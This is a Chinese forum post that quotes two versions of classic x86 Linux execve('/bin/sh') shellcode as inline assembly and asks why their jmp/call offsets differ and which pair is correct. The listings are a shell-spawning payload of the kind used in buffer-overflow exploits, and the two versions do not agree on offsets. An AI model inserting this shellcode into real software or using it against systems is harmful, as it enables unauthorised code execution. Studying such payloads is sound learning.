- 论坛徽章:
- 1
|
- void main() {
- __asm__("
- jmp 0x2a # 3 bytes
- popl %esi # 1 byte
- movl %esi,0x8(%esi) # 3 bytes
- movb $0x0,0x7(%esi) # 4 bytes
- movl $0x0,0xc(%esi) # 7 bytes
- movl $0xb,%eax # 5 bytes
- movl %esi,%ebx # 2 bytes
- leal 0x8(%esi),%ecx # 3 bytes
- leal 0xc(%esi),%edx # 3 bytes
- int $0x80 # 2 bytes
- movl $0x1, %eax # 5 bytes
- movl $0x0, %ebx # 5 bytes
- int $0x80 # 2 bytes
- call -0x2f # 5 bytes
- .string \"/bin/sh\" # 8 bytes
- ");
- }
- jmp 0x26 # 2 bytes
- popl %esi # 1 byte
- movl %esi,0x8(%esi) # 3 bytes
- movb $0x0,0x7(%esi) # 4 bytes
- movl $0x0,0xc(%esi) # 7 bytes
- movl $0xb,%eax # 5 bytes
- movl %esi,%ebx # 2 bytes
- leal 0x8(%esi),%ecx # 3 bytes
- leal 0xc(%esi),%edx # 3 bytes
- int $0x80 # 2 bytes
- movl $0x1, %eax # 5 bytes
- movl $0x0, %ebx # 5 bytes
- int $0x80 # 2 bytes
- call -0x2b # 5 bytes
- .string \"/bin/sh\" # 8 bytes
复制代码
为什么在文中的两个偏移量不一样
1. jmp 0x26 call -0x2b
2. jmp 0x2a call -0x2f
到底哪一个对 |
|